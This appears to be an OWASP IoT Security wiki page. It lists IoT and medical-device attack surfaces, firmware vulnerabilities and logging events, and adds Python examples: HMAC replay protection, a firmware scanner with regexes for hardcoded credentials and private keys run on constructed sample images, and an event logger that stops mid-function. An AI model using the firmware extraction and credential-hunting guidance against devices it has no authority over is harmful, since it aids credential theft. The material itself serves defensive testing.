The IoT Attack Surface Areas Project provides a list of attack surfaces that should be understood by manufacturers, developers, security researchers, and those looking to deploy or implement IoT technologies within their organizations.<br />
<br />
== Project Leaders ==<br />
<br />
* Daniel Miessler<br />
* Craig Smith<br />
<br />
== Related Projects ==<br />
<br />
* [https://www.owasp.org/index.php/OWASP_Mobile_Security_Project The OWASP Mobile Top 10 Project]<br />
* [https://www.owasp.org/index.php/Category:OWASP_Top_Ten_Project The OWASP Web Top 10 Project]<br />
<br />
== Collaboration ==<br />
[https://owasp.slack.com The Slack Channel]<br />
<br />
== Quick Download ==<br />
* Coming Soon<br />
<br />
== News and Events ==<br />
* Coming Soon<br />
<br />
|}<br />
<br />
= IoT Vulnerabilities =<br />
<br />
<div style="width:100%;height:160px;border:0,margin:0;overflow: hidden;">[[File:OWASP_Project_Header.jpg|link=]]</div><br />
<br />
{| style="padding: 0;margin:0;margin-top:10px;text-align:left;" |-<br />
| style="border-right: 1px dotted gray;padding-right:25px;" valign="top" |<br />
<br />
== IoT Vulnerabilities Project ==<br />
<br />
{| class="wikitable" style="text-align: left" border="1"<br />
! Vulnerability<br />
! Attack Surface<br />
! Summary<br />
|-<br />
| '''Username Enumeration'''<br />
|<br />
* Administrative Interface<br />
* Device Web Interface<br />
* Cloud Interface<br />
* Mobile Application<br />
|<br />
* Ability to collect a set of valid usernames by interacting with the authentication mechanism<br />
|-<br />
| '''Weak Passwords'''<br />
|<br />
* Administrative Interface<br />
* Device Web Interface<br />
* Cloud Interface<br />
* Mobile Application<br />
|<br />
* Ability to set account passwords to weak values such as '1234' or '123456'<br />
* Usage of pre-programmed default passwords<br />
|-<br />
| '''Account Lockout'''<br />
|<br />
* Administrative Interface<br />
* Device Web Interface<br />
* Cloud Interface<br />
* Mobile Application<br />
|<br />
* Ability to continue sending authentication attempts after 3-5 failed login attempts, i.e. no lockout is enforced<br />
|-<br />
| '''Unencrypted Services'''<br />
|<br />
* Device Network Services<br />
|<br />
* Network services are not properly encrypted to prevent eavesdropping or tampering by attackers<br />
|-<br />
| '''Two-factor Authentication'''<br />
|<br />
* Administrative Interface<br />
* Cloud Web Interface<br />
* Mobile Application<br />
|<br />
* Lack of two-factor authentication mechanisms such as a security token or fingerprint scanner<br />
|-<br />
| '''Poorly Implemented Encryption'''<br />
|<br />
* Device Network Services<br />
|<br />
* Encryption is implemented, but it is improperly configured or not kept up to date, e.g. still using SSL v2<br />
|-<br />
| '''Update Sent Without Encryption'''<br />
|<br />
* Update Mechanism<br />
|<br />
* Updates are transmitted over the network without using TLS or encrypting the update file itself<br />
|-<br />
| '''Update Location Writable'''<br />
|<br />
* Update Mechanism<br />
|<br />
* The storage location for update files is world-writable, potentially allowing firmware to be modified and distributed to all users<br />
|-<br />
| '''Denial of Service'''<br />
|<br />
* Device Network Services<br />
|<br />
* The service can be attacked in a way that denies service to that service or to the entire device<br />
|-<br />
| '''Removal of Storage Media'''<br />
|<br />
* Device Physical Interfaces<br />
|<br />
* Ability to physically remove the storage media from the device<br />
|-<br />
| '''No Manual Update Mechanism'''<br />
|<br />
* Update Mechanism<br />
|<br />
* No ability to manually force an update check for the device<br />
|-<br />
| '''Missing Update Mechanism'''<br />
|<br />
* Update Mechanism<br />
|<br />
* No ability to update device<br />
|-<br />
| '''Firmware Version Display and/or Last Update Date'''<br />
|<br />
* Device Firmware<br />
|<br />
* Current firmware version is not displayed and/or the last update date is not displayed<br />
|-<br />
| '''Firmware and storage extraction'''<br />
|<br />
* JTAG / SWD interface<br />
* [https://www.flashrom.org/Flashrom In-Situ dumping]<br />
* Intercepting an OTA update<br />
* Downloading from the manufacturer's web page<br />
* [https://www.exploitee.rs/index.php/Exploitee.rs_Low_Voltage_e-MMC_Adapter eMMC tapping]<br />
* Unsoldering the SPI Flash / eMMC chip and reading it in an adapter<br />
|<br />
* Firmware contains a lot of useful information, such as source code and binaries of running services, pre-set passwords, SSH keys, etc.<br />
|-<br />
| '''Manipulating the code execution flow of the device'''<br />
|<br />
* JTAG / SWD interface<br />
* [https://wiki.newae.com/Main_Page Side channel attacks like glitching]<br />
|<br />
* With the help of a JTAG adapter and gdb, the execution of the firmware on the device can be modified to bypass almost all software-based security controls.<br />
* Side channel attacks can also modify the execution flow, or can be used to leak interesting information from the device<br />
|-<br />
| '''Obtaining console access'''<br />
|<br />
* Serial interfaces (SPI / UART)<br />
|<br />
* Connecting to a serial interface provides full console access to the device<br />
* Security measures usually include custom bootloaders that prevent an attacker from entering single-user mode, but these can also be bypassed.<br />
|-<br />
| '''Insecure 3rd party components'''<br />
|<br />
* Software<br />
|<br />
* Out-of-date versions of BusyBox, OpenSSL, SSH, web servers, etc.<br />
|-<br />
<br />
|}<br />
<br />
{{Social Media Links}}<br />
<br />
| style="padding-left:25px;width:300px;border-right: 1px dotted gray;padding-right:25px;" valign="top" |<br />
<br />
== What is the IoT Vulnerabilities Project? ==<br />
<br />
The IoT Vulnerabilities Project provides:<br />
<br />
* Information on the top IoT vulnerabilities<br />
* The attack surface associated with the vulnerability<br />
* A summary of the vulnerability<br />
<br />
== Project Leaders ==<br />
<br />
* Daniel Miessler<br />
* Craig Smith<br />
<br />
== Related Projects ==<br />
<br />
* [[OWASP_Mobile_Security_Project|OWASP Mobile Security]]<br />
* [[OWASP_Top_Ten_Project|OWASP Web Top 10]]<br />
<br />
== Collaboration ==<br />
[https://owasp-iot-security.slack.com The Slack Channel]<br />
<br />
== Resources ==<br />
* [https://www.owasp.org/index.php/Top_IoT_Vulnerabilities Top 10 IoT Vulnerabilities from 2014]<br />
<br />
== News and Events ==<br />
* Coming Soon<br />
<br />
|}<br />
<br />
= Medical Devices =<br />
<br />
<div style="width:100%;height:160px;border:0,margin:0;overflow: hidden;">[[File:OWASP_Project_Header.jpg|link=]]</div><br />
<br />
{| style="padding: 0;margin:0;margin-top:10px;text-align:left;" |-<br />
| style="border-right: 1px dotted gray;padding-right:25px;" valign="top" |<br />
<br />
== Medical Device Testing ==<br />
<br />
The Medical Device Testing project is intended to provide some basic attack surface considerations that should be evaluated before shipping Medical Device equipment.<br />
<br />
{| class="wikitable" style="text-align: left" border="1"<br />
! Attack Surface<br />
! Vulnerability<br />
|- <br />
| '''Ecosystem (general)'''<br />
|<br />
* Interoperability standards<br />
* Data governance<br />
* System wide failure<br />
* Individual stakeholder risks<br />
* Implicit trust between components<br />
* Enrollment security<br />
* Decommissioning system<br />
* Lost access procedures<br />
|- <br />
| '''HL7'''<br />
|<br />
* XML Parsing<br />
** XSS<br />
* Information Disclosure<br />
|- <br />
| '''Device Memory'''<br />
|<br />
* Sensitive data<br />
** Cleartext usernames<br />
** Cleartext passwords<br />
** Third-party credentials<br />
** Encryption keys<br />
|- <br />
| '''Device Physical Interfaces'''<br />
|<br />
* Firmware extraction<br />
* User CLI<br />
* Admin CLI<br />
* Privilege escalation<br />
* Reset to insecure state<br />
* Removal of storage media<br />
* Tamper resistance<br />
* Debug port<br />
* Device ID/Serial number exposure<br />
|-<br />
| '''Device Web Interface'''<br />
|<br />
* Standard set of web vulnerabilities:<br />
** SQL injection<br />
** Cross-site scripting<br />
** Cross-site Request Forgery<br />
** Username enumeration<br />
* Credential management vulnerabilities:<br />
** Username enumeration<br />
** Weak passwords<br />
** Account lockout<br />
** Known default credentials<br />
** Insecure password recovery mechanism<br />
|- <br />
| '''Device Firmware'''<br />
|<br />
* Sensitive data exposure:<br />
** Backdoor accounts<br />
** Hardcoded credentials<br />
** Encryption keys<br />
** Encryption (Symmetric, Asymmetric)<br />
** Sensitive information<br />
** Sensitive URL disclosure<br />
* Firmware version display and/or last update date<br />
* Vulnerable services (web, ssh, tftp, etc.)<br />
* Security related function API exposure<br />
* Firmware downgrade<br />
|- <br />
| '''Device Network Services'''<br />
|<br />
* Information disclosure<br />
* User CLI<br />
* Administrative CLI<br />
* Injection<br />
* Denial of Service<br />
* Unencrypted Services<br />
* Poorly implemented encryption<br />
* Test/Development Services<br />
* Buffer Overflow<br />
* UPnP<br />
* Vulnerable UDP Services<br />
* DoS<br />
* Device Firmware OTA update block<br />
* Replay attack<br />
* Lack of payload verification<br />
* Lack of message integrity check<br />
* Credential management vulnerabilities:<br />
** Username enumeration<br />
** Weak passwords<br />
** Account lockout<br />
** Known default credentials<br />
** Insecure password recovery mechanism<br />
|- <br />
| '''Administrative Interface'''<br />
|<br />
* Standard web vulnerabilities:<br />
** SQL injection<br />
** Cross-site scripting<br />
** Cross-site Request Forgery<br />
** Username enumeration<br />
* Credential management vulnerabilities:<br />
** Username enumeration<br />
** Weak passwords<br />
** Account lockout<br />
** Known default credentials<br />
** Insecure password recovery mechanism<br />
* Security/encryption options<br />
* Logging options<br />
* Two-factor authentication<br />
* Inability to wipe device<br />
|- <br />
| '''Local Data Storage'''<br />
|<br />
* Unencrypted data<br />
* Data encrypted with discovered keys<br />
* Lack of data integrity checks<br />
* Use of a single static encryption/decryption key<br />
|- <br />
| '''Cloud Web Interface'''<br />
|<br />
* Standard set of web vulnerabilities:<br />
** SQL injection<br />
** Cross-site scripting<br />
** Cross-site Request Forgery<br />
* Credential management vulnerabilities:<br />
** Username enumeration<br />
** Weak passwords<br />
** Account lockout<br />
** Known default credentials<br />
** Insecure password recovery mechanism<br />
* Transport encryption<br />
* Two-factor authentication<br />
|- <br />
| '''Third-party Backend APIs'''<br />
|<br />
* Unencrypted PII sent<br />
* Encrypted PII sent<br />
* Device information leaked<br />
* Location leaked<br />
|- <br />
| '''Update Mechanism'''<br />
|<br />
* Update sent without encryption<br />
* Updates not signed<br />
* Update location writable<br />
* Update verification<br />
* Update authentication<br />
* Malicious update<br />
* Missing update mechanism<br />
* No manual update mechanism<br />
|- <br />
| '''Mobile Application'''<br />
|<br />
* Implicitly trusted by device or cloud<br />
* Username enumeration<br />
* Account lockout<br />
* Known default credentials<br />
* Weak passwords<br />
* Insecure data storage<br />
* Transport encryption<br />
* Insecure password recovery mechanism<br />
* Two-factor authentication<br />
|- <br />
| '''Vendor Backend APIs'''<br />
|<br />
* Inherent trust of cloud or mobile application<br />
* Weak authentication<br />
* Weak access controls<br />
* Injection attacks<br />
* Hidden services<br />
|- <br />
| '''Ecosystem Communication'''<br />
|<br />
* Health checks<br />
* Heartbeats<br />
* Ecosystem commands<br />
* Deprovisioning<br />
* Pushing updates<br />
|- <br />
| '''Network Traffic'''<br />
|<br />
* LAN<br />
* LAN to Internet<br />
* Short range<br />
* Non-standard<br />
* Wireless (WiFi, Z-wave, XBee, Zigbee, Bluetooth, LoRA)<br />
* Protocol fuzzing<br />
|- <br />
| '''Authentication/Authorization'''<br />
|<br />
* Authentication/Authorization related values (session key, token, cookie, etc.) disclosure<br />
* Reusing of session key, token, etc.<br />
* Device to device authentication<br />
* Device to mobile Application authentication<br />
* Device to cloud system authentication<br />
* Mobile application to cloud system authentication<br />
* Web application to cloud system authentication<br />
* Lack of dynamic authentication<br />
|-<br />
| '''Data Flow'''<br />
|<br />
* What data is being captured?<br />
* How does it move within the ecosystem?<br />
* How is it protected in transit?<br />
* How is it protected at rest?<br />
* Who is that data shared with?<br />
|-<br />
| '''Hardware (Sensors)'''<br />
|<br />
* Sensing Environment Manipulation<br />
* Tampering (Physically)<br />
* Damaging (Physically)<br />
* Failure state analysis<br />
|-<br />
|}<br />
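Several of the items above (replay attack, lack of payload verification and lack of message integrity check under Device Network Services; reuse of session keys and tokens under Authentication/Authorization) come down to one missing control: the receiver never checks that a message is authentic, unmodified and fresh. The following is an added example, not code from the OWASP IoT Project, showing a device-to-cloud exchange in which each message is bound to the device identity and a monotonically increasing counter under an HMAC, and the cloud side rejects tampered, replayed and unenrolled senders. The device identifier, key and sensor readings are constructed for the illustration; a real deployment would provision the key at enrollment and still carry the messages over TLS.<br />
<br />
```python
import hashlib
import hmac
import json

# Assumed per-device key, provisioned at enrollment (constructed value, not a real key).
DEVICE_ID = "sensor-0042"
DEVICE_KEY = bytes.fromhex("00112233445566778899aabbccddeeff00112233445566778899aabbccddeeff")


def canonical(body: dict) -> bytes:
    """Deterministic serialisation so both sides MAC exactly the same bytes."""
    return json.dumps(body, sort_keys=True, separators=(",", ":")).encode()


def device_send(counter: int, payload: dict, device_id: str = DEVICE_ID, key: bytes = DEVICE_KEY) -> dict:
    """Device side: bind identity, counter and payload under one MAC.

    The counter must be persisted across reboots; if it resets, the cloud will
    reject every message as a replay until the two sides resynchronise."""
    body = {"device_id": device_id, "counter": counter, "payload": payload}
    tag = hmac.new(key, canonical(body), hashlib.sha256).hexdigest()
    return {**body, "mac": tag}


class CloudReceiver:
    """Cloud side: authenticate, integrity-check and de-duplicate device messages."""

    def __init__(self, device_keys: dict):
        self.device_keys = device_keys          # device_id -> key, enrolled devices only
        self.last_counter = {}                  # device_id -> highest counter accepted so far

    def accept(self, msg: dict) -> tuple:
        device_id = msg.get("device_id")
        key = self.device_keys.get(device_id)
        if key is None:
            return False, "unknown device"      # unenrolled or decommissioned sender
        try:
            body = {k: msg[k] for k in ("device_id", "counter", "payload")}
        except KeyError:
            return False, "malformed"
        expected = hmac.new(key, canonical(body), hashlib.sha256).hexdigest()
        # Constant-time compare; catches forged messages and any edit to the payload.
        if not hmac.compare_digest(expected, str(msg.get("mac", ""))):
            return False, "bad mac"
        # Freshness: the counter must be strictly greater than the last one accepted.
        if not isinstance(body["counter"], int) or body["counter"] <= self.last_counter.get(device_id, -1):
            return False, "replay"
        self.last_counter[device_id] = body["counter"]
        return True, "ok"


def demo() -> list:
    """Constructed exchange; returns the cloud's verdict for each message in order."""
    cloud = CloudReceiver({DEVICE_ID: DEVICE_KEY})
    m1 = device_send(1, {"temp_c": 21.5})
    m2 = device_send(2, {"temp_c": 21.7})
    tampered = dict(m2, payload={"temp_c": 99.0})                    # payload edited, MAC kept
    stranger = device_send(1, {"temp_c": 0.0}, device_id="rogue-01", key=b"\x00" * 32)
    verdicts = [
        cloud.accept(m1),                                            # fresh and valid
        cloud.accept(m1),                                            # captured and replayed
        cloud.accept(tampered),                                      # integrity failure
        cloud.accept(stranger),                                      # not enrolled
        cloud.accept(m2),                                            # next legitimate message
        cloud.accept(device_send(1, {"temp_c": 21.5})),              # re-signed but stale counter
    ]
    return [reason for _, reason in verdicts]


if __name__ == "__main__":
    print(demo())
```
<br />
A symmetric key is convenient because a constrained device can compute an HMAC cheaply, but whoever holds the key (the cloud, or anyone who reads it out of device memory) can also forge messages; where that matters, sign with a per-device asymmetric key instead. Note that the MAC is checked before the counter, so a tampered message is reported as an integrity failure rather than a replay.<br />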
<br />
{{Social Media Links}}<br />
<br />
| style="padding-left:25px;width:300px;border-right: 1px dotted gray;padding-right:25px;" valign="top" |<br />
<br />
== What is the Medical Attack Surfaces project? ==<br />
<br />
The Medical Attack Surfaces project provides:<br />
<br />
* A simple way for testers, manufacturers, developers, and users to understand the complexity of a modern medical environment<br />
* A way to visualize the numerous attack surfaces that need to be defended within medical equipment ecosystems<br />
<br />
== Project Leaders ==<br />
<br />
* Daniel Miessler<br />
<br />
== Related Projects ==<br />
<br />
* [[OWASP_Mobile_Security_Project|OWASP Mobile Security]]<br />
* [[OWASP_Top_Ten_Project|OWASP Web Top 10]]<br />
<br />
== Collaboration ==<br />
[https://owasp-iot-security.slack.com The Slack Channel]<br />
<br />
== Resources ==<br />
* [https://www.owasp.org/index.php/IoT_Firmware_Analysis IoT Firmware Analysis Primer]<br />
* [https://otalliance.org/initiatives/internet-things Online Trust Alliance - Internet of Things]<br />
* [https://people.debian.org/~aurel32/qemu/ Pre-compiled QEMU images]<br />
* [https://code.google.com/archive/p/firmware-mod-kit/ Firmware Modification Kit]<br />
* [https://craigsmith.net/episode-11-1-firmware-extraction/ Short Firmware Extraction Video]<br />
* [https://craigsmith.net/episode-12-1-firmware-emulation-with-qemu/ Firmware Emulation with QEMU]<br />
* [https://craigsmith.net/episode-18-1-file-extraction-from-network-capture/ File Extraction from Network Capture]<br />
<br />
== News and Events ==<br />
* Daniel Miessler presented on using Adaptive Testing Methodologies to evaluate the security of medical devices at RSA 2017.<br />
<br />
|}<br />
<br />
= Firmware Analysis =<br />
<br />
<div style="width:100%;height:160px;border:0,margin:0;overflow: hidden;">[[File:OWASP_Project_Header.jpg|link=]]</div><br />
<br />
{| style="padding: 0;margin:0;margin-top:10px;text-align:left;" |-<br />
| style="border-right: 1px dotted gray;padding-right:25px;" valign="top" |<br />
<br />
== Firmware Analysis Project ==<br />
<br />
The Firmware Analysis Project is intended to provide security testing guidance for the IoT Attack Surface "Device Firmware":<br />
<br />
{| class="wikitable" style="text-align: left" border="1"<br />
! Section<br />
! <br />
|- <br />
|<br />
Device Firmware Vulnerabilities<br />
|<br />
* Out-of-date core components<br />
* Unsupported core components<br />
* Expired and/or self-signed certificates<br />
* Same certificate used on multiple devices<br />
* Admin web interface concerns<br />
* Hardcoded or easy to guess credentials<br />
* Sensitive information disclosure<br />
* Sensitive URL disclosure<br />
* Encryption key exposure<br />
* Backdoor accounts<br />
* Vulnerable services (web, ssh, tftp, etc.)<br />
|-<br />
|<br />
Manufacturer Recommendations<br />
|<br />
* Ensure that supported and up-to-date software is used by developers<br />
* Ensure that robust update mechanisms are in place for devices<br />
* Ensure that certificates are not duplicated across devices and product lines.<br />
* Develop a mechanism to ensure a new certificate is installed when old ones expire<br />
* Disable deprecated SSL versions<br />
* Ensure developers do not code in easy to guess or common admin passwords<br />
* Ensure services such as SSH have a secure password created<br />
* Develop a mechanism that requires the user to create a secure admin password during initial device setup<br />
* Ensure developers do not hard code passwords or hashes<br />
* Have source code reviewed by a third party before releasing device to production<br />
* Ensure industry standard encryption or strong hashing is used<br />
|-<br />
|<br />
Device Firmware Guidance and Instruction<br />
|<br />
* Firmware file analysis<br />
* Firmware extraction<br />
* Dynamic binary analysis<br />
* Static binary analysis<br />
* Static code analysis<br />
* Firmware emulation<br />
* File system analysis<br />
|-<br />
|<br />
Device Firmware Tools<br />
|<br />
* [https://github.com/craigz28/firmwalker Firmwalker] <br />
* [https://code.google.com/archive/p/firmware-mod-kit/ Firmware Modification Kit]<br />
* [https://github.com/angr/angr Angr binary analysis framework]<br />
* [http://binwalk.org/ Binwalk firmware analysis tool]<br />
* [http://www.binaryanalysis.org/en/home Binary Analysis Tool]<br />
* [https://github.com/firmadyne/firmadyne Firmadyne]<br />
|-<br />
|<br />
Vulnerable Firmware<br />
|<br />
* [https://github.com/praetorian-inc/DVRF Damn Vulnerable Router Firmware]<br />
|-<br />
|}<br />
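Most of the Device Firmware Vulnerabilities above (backdoor accounts, hardcoded credentials, encryption key exposure, the same certificate on multiple devices) are found during the file system analysis step, once the image has been unpacked with a tool such as Binwalk. The following is an added example, not code from this project or from Firmwalker, that walks two extracted root file systems and flags extra UID 0 accounts, empty or crackable password fields in /etc/shadow, PEM private keys, credential-looking settings in text files, and certificate blocks that are byte-identical across images. Both images, the PEM bodies and the shadow hash are constructed placeholders, not real key material.<br />
<br />
```python
import hashlib
import re
import tempfile
from pathlib import Path

# Text patterns used by the checks. Constructed for this example; a real review would
# extend them (Firmwalker ships much longer keyword lists).
PRIVATE_KEY_RE = re.compile(r"-----BEGIN (?:[A-Z ]+ )?PRIVATE KEY-----")
CERT_RE = re.compile(r"-----BEGIN CERTIFICATE-----.*?-----END CERTIFICATE-----", re.S)
CREDENTIAL_RE = re.compile(r"(?i)(?:pass(?:word|wd)?|pwd|secret|api[_-]?key|token)\s*[:=]\s*\S+")
LOCKED = ("*", "!", "!!")                        # shadow fields that mean "no password login"


def is_binary(data: bytes) -> bool:
    return b"\x00" in data[:1024]                 # ELF and friends belong to the binary-analysis step


def scan_root(root: Path) -> list:
    """Walk one extracted root file system; return (category, path, detail) findings."""
    findings = []
    for p in sorted(x for x in root.rglob("*") if x.is_file()):
        rel, data = p.relative_to(root).as_posix(), p.read_bytes()
        if is_binary(data):
            continue
        text = data.decode("utf-8", "replace")
        if rel == "etc/passwd":
            for f in (line.split(":") for line in text.splitlines()):
                if len(f) >= 7 and f[2] == "0" and f[0] != "root":
                    findings.append(("extra_uid0_account", rel, f[0]))     # possible backdoor account
        elif rel == "etc/shadow":
            for f in (line.split(":") for line in text.splitlines()):
                if len(f) < 2:
                    continue
                if f[1] == "":
                    findings.append(("empty_password", rel, f[0]))
                elif f[1] not in LOCKED and not f[1].startswith("!"):
                    findings.append(("password_hash", rel, f[0]))          # hardcoded credential, crackable offline
        elif PRIVATE_KEY_RE.search(text):
            findings.append(("private_key", rel, ""))                      # encryption key exposure
        else:
            for m in CREDENTIAL_RE.finditer(text):
                findings.append(("hardcoded_credential", rel, m.group(0)))
    return findings


def certificate_fingerprints(root: Path) -> dict:
    """SHA-256 of each PEM certificate block: a byte-identical reuse check, not X.509 parsing."""
    fps = {}
    for p in sorted(x for x in root.rglob("*") if x.is_file()):
        if not is_binary(p.read_bytes()):
            for m in CERT_RE.finditer(p.read_text("utf-8", "replace")):
                fps[hashlib.sha256(m.group(0).encode()).hexdigest()] = p.relative_to(root).as_posix()
    return fps


def scan_images(images: dict) -> dict:
    """Scan several extracted images and report certificates present in more than one of them."""
    owners = {}
    for name, root in images.items():
        for fp in certificate_fingerprints(root):
            owners.setdefault(fp, set()).add(name)
    return {"findings": {name: scan_root(root) for name, root in images.items()},
            "shared_certificates": {fp: sorted(o) for fp, o in owners.items() if len(o) > 1}}


# Constructed sample: two fake extracted images. PEM bodies and the shadow hash are placeholders.
FAKE_CERT = "-----BEGIN CERTIFICATE-----\nMIIBconstructedPlaceholderCertBody==\n-----END CERTIFICATE-----\n"
FAKE_KEY = "-----BEGIN RSA PRIVATE KEY-----\nMIIEconstructedPlaceholderKeyBody==\n-----END RSA PRIVATE KEY-----\n"
SAMPLE_IMAGES = {
    "image_a": {
        "etc/passwd": "root:x:0:0:root:/root:/bin/sh\nsupport:x:0:0:vendor support:/:/bin/sh\n"
                      "nobody:x:65534:65534:nobody:/:/bin/false\n",
        "etc/shadow": "root:$1$Qz7k1s$WQvnFq2Pz6V0d1c0ZQxJYu:17000:0:99999:7:::\n"
                      "support::17000:0:99999:7:::\nnobody:*:17000:0:99999:7:::\n",
        "etc/ssl/device.key": FAKE_KEY,
        "etc/ssl/device.crt": FAKE_CERT,
        "etc/app.conf": "listen = 0.0.0.0:8080\nadmin_password = admin123\napi_key = 4f3c2b1a\n",
        "bin/busybox": "\x7fELF\x00\x00fake-binary",
    },
    "image_b": {
        "etc/passwd": "root:x:0:0:root:/root:/bin/sh\n",
        "etc/shadow": "root:!:17000:0:99999:7:::\n",
        "etc/ssl/device.crt": FAKE_CERT,                 # same certificate shipped in a second product
    },
}


def build_sample_images(base: Path) -> dict:
    roots = {}
    for image, tree in SAMPLE_IMAGES.items():
        for rel, content in tree.items():
            path = base / image / rel
            path.parent.mkdir(parents=True, exist_ok=True)
            path.write_bytes(content.encode("latin-1"))
        roots[image] = base / image
    return roots


def demo() -> dict:
    with tempfile.TemporaryDirectory() as tmp:
        return scan_images(build_sample_images(Path(tmp)))
```
<br />
Point scan_images at the directories produced by binwalk -e (one per image) to use it on real firmware; demo() builds the two constructed trees and returns the report. The certificate check compares PEM text, so it only catches exact reuse; on real images run openssl x509 -noout -fingerprint -dates on each certificate to compare fingerprints and also catch expired or self-signed certificates.<br />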
<br />
{{Social Media Links}}<br />
<br />
| style="padding-left:25px;width:300px;border-right: 1px dotted gray;padding-right:25px;" valign="top" |<br />
<br />
== What is the Firmware Analysis Project? ==<br />
<br />
The Firmware Analysis Project provides:<br />
<br />
* Security testing guidance for vulnerabilities in the "Device Firmware" attack surface<br />
* Steps for extracting file systems from various firmware files<br />
* Guidance on searching a file system for sensitive or interesting data<br />
* Information on static analysis of firmware contents<br />
* Information on dynamic analysis of emulated services (e.g. web admin interface)<br />
* Testing tool links<br />
* A site for pulling together existing information on firmware analysis<br />
<br />
== Project Leaders ==<br />
<br />
* Craig Smith<br />
<br />
== Related Projects ==<br />
<br />
* [[OWASP_Mobile_Security_Project|OWASP Mobile Security]]<br />
* [[OWASP_Top_Ten_Project|OWASP Web Top 10]]<br />
* [https://www.owasp.org/index.php/OWASP_Embedded_Application_Security OWASP Embedded Application Security Project]<br />
<br />
== Collaboration ==<br />
[https://owasp-iot-security.slack.com The Slack Channel]<br />
<br />
== Resources ==<br />
* [https://www.owasp.org/index.php/IoT_Firmware_Analysis IoT Firmware Analysis Primer]<br />
* [https://otalliance.org/initiatives/internet-things Online Trust Alliance - Internet of Things]<br />
* [https://people.debian.org/~aurel32/qemu/ Pre-compiled QEMU images]<br />
* [https://code.google.com/archive/p/firmware-mod-kit/ Firmware Modification Kit]<br />
* [https://craigsmith.net/episode-11-1-firmware-extraction/ Short Firmware Extraction Video]<br />
* [https://craigsmith.net/episode-12-1-firmware-emulation-with-qemu/ Firmware Emulation with QEMU]<br />
* [https://craigsmith.net/episode-18-1-file-extraction-from-network-capture/ File Extraction from Network Capture]<br />
<br />
== News and Events ==<br />
* Coming Soon<br />
<br />
|}<br />
<br />
= IoT Event Logging Project=<br />
<br />
<div style="width:100%;height:160px;border:0,margin:0;overflow: hidden;">[[File: OWASP_Project_Header.jpg|link=]]</div><br />
<br />
{| style="padding: 0;margin:0;margin-top:10px;text-align:left;" |-<br />
| style="border-right: 1px dotted gray;padding-right:25px;" valign="top" |<br />
<br />
== IoT Logging Events==<br />
<br />
This is a working draft of the recommended minimum set of IoT device logging events. It covers many different types of devices, including consumer IoT, enterprise IoT, and ICS/SCADA devices.<br />
<br />
{| class="wikitable" style="text-align: left" border="1"<br />
! Event Category<br />
! Events<br />
|-<br />
| '''Request Exceptions'''<br />
|<br />
* Attempt to Invoke Unsupported HTTP Method<br />
* Unexpected Quantity of Characters in Parameter<br />
* Unexpected Type of Characters in Parameter<br />
|-<br />
| '''Authentication Exceptions'''<br />
|<br />
* Multiple Failed Passwords<br />
* High Rate of Login Attempts<br />
* Additional POST Variable<br />
* Deviation from Normal GEO Location<br />
|-<br />
| '''Session Exceptions'''<br />
|<br />
* Modifying the Existing Cookie<br />
* Substituting Another User's Valid SessionID or Cookie<br />
* Source Location Changes During Session<br />
|-<br />
| '''Access Control Exceptions'''<br />
|<br />
* Modifying URL Argument Within a GET for Direct Object Access Attempt<br />
* Modifying Parameter Within a POST for Direct Object Access Attempt<br />
* Forced Browsing Attempt<br />
|-<br />
| '''Ecosystem Membership Exceptions'''<br />
|<br />
* Traffic Seen from Disenrolled System<br />
* Traffic Seen from Unenrolled System<br />
* Failed Attempt to Enroll in Ecosystem<br />
* Multiple Attempts to Enroll in Ecosystem<br />
|-<br />
| '''Device Access Events'''<br />
|<br />
* Device Case Tampering Detected<br />
* Device Logic Board Tampering Detected<br />
|-<br />
| '''Administrative Mode Events'''<br />
|<br />
* Device Entered Administrative Mode<br />
* Device Accessed Using Default Administrative Credentials<br />
|-<br />
| '''Input Exceptions'''<br />
|<br />
* Double Encoded Character<br />
* Unexpected Encoding Used<br />
|-<br />
| '''Command Injection Exceptions'''<br />
|<br />
* Blacklist Inspection for Common SQL Injection Values<br />
* Abnormal Quantity of Returned Records<br />
|-<br />
| '''Honey Trap Exceptions'''<br />
|<br />
* Honey Trap Resource Requested<br />
* Honey Trap Data Used<br />
|-<br />
| '''Reputation Exceptions'''<br />
|<br />
* Suspicious or Disallowed User Source Location<br />
<br />
|-<br />
|}<br />
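The table lists what a device should log but not how a device might produce those events. The following is an added example, not code from the OWASP IoT Project or the AppSensor project, of a small device-side component that emits a subset of the events above as structured records: ecosystem membership events from an enrolled/disenrolled list, a request exception for unsupported HTTP methods, a honey-trap path, failed-password and login-rate thresholds, and a successful login with the factory default administrative credential. The device name, thresholds, decoy path and credentials are constructed for the illustration.<br />
<br />
```python
import hashlib
import hmac
import json
from collections import defaultdict, deque

# Thresholds and decoys are assumptions for the example, not values from the project.
FAIL_THRESHOLD = 3                    # failed passwords per user before the event fires
RATE_LIMIT = 5                        # login attempts per source within RATE_WINDOW seconds
RATE_WINDOW = 60.0
SUPPORTED_METHODS = {"GET", "POST"}
HONEY_PATHS = {"/admin/backup.zip"}   # decoy resource that no legitimate client requests


def pw_hash(password: str, salt: bytes) -> bytes:
    # PBKDF2 keeps the example stdlib-only; use a higher iteration count or Argon2 in production.
    return hashlib.pbkdf2_hmac("sha256", password.encode(), salt, 20_000)


class DeviceEventLogger:
    """Device-side request handling and authentication that emit structured security events."""

    def __init__(self, device_id, users, factory_default, enrolled, disenrolled, clock):
        self.device_id = device_id
        self.users = users                       # user -> (salt, pbkdf2 hash)
        self.factory_default = factory_default   # (user, salt, hash) of the credential shipped on the device
        self.enrolled, self.disenrolled = set(enrolled), set(disenrolled)
        self.clock = clock                       # injectable so the demo is deterministic
        self.events = []                         # one dict per event, ready for json.dumps
        self.failures = defaultdict(int)         # user -> consecutive failed passwords
        self.attempts = defaultdict(deque)       # src_ip -> timestamps of recent login attempts

    def log(self, category, event, **fields):
        self.events.append({"ts": self.clock(), "device": self.device_id,
                            "category": category, "event": event, **fields})

    def handle_request(self, peer_id, src_ip, method, path):
        if peer_id in self.disenrolled:
            self.log("Ecosystem Membership Exceptions", "Traffic Seen from Disenrolled System", peer=peer_id, src=src_ip)
        elif peer_id not in self.enrolled:
            self.log("Ecosystem Membership Exceptions", "Traffic Seen from Unenrolled System", peer=peer_id, src=src_ip)
        if method not in SUPPORTED_METHODS:
            self.log("Request Exceptions", "Attempt to Invoke Unsupported HTTP Method", method=method, path=path, src=src_ip)
        if path in HONEY_PATHS:
            self.log("Honey Trap Exceptions", "Honey Trap Resource Requested", path=path, src=src_ip)

    def login(self, src_ip, user, password) -> bool:
        now = self.clock()
        recent = self.attempts[src_ip]
        recent.append(now)
        while recent and now - recent[0] > RATE_WINDOW:
            recent.popleft()
        if len(recent) >= RATE_LIMIT:
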